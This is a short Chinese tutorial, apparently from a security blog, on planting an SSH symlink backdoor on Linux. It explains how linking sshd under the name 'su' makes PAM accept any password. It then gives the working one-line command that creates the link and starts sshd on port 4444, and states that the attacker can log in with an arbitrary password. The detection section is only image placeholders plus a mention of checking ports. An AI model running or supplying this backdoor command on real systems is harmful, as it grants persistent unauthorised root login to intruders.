ssh软连接后门

ssh软连接后门

原理:

软连接后门的原理是利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中会去PAM配置文件中寻找是否存在对应名称的配置信息(su),su在pam_rootok只检测uid 0 即认证成功,导致可以使用任意密码去登录。

ssh软连接后门实现:

被攻击机:

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=4444

bd1f4035d3fc4ba6bb59c52817178c62.png

攻击机进行连接(密码这里可以任意输入):

ssh软连接后门_第1张图片

成功登录!

ssh软连接后门检测响应:

ssh软连接后门_第2张图片

查看系统当前的端口状态:

ssh软连接后门_第3张图片

 

 

 

 

你可能感兴趣的:(网络安全,linux,web安全,安全)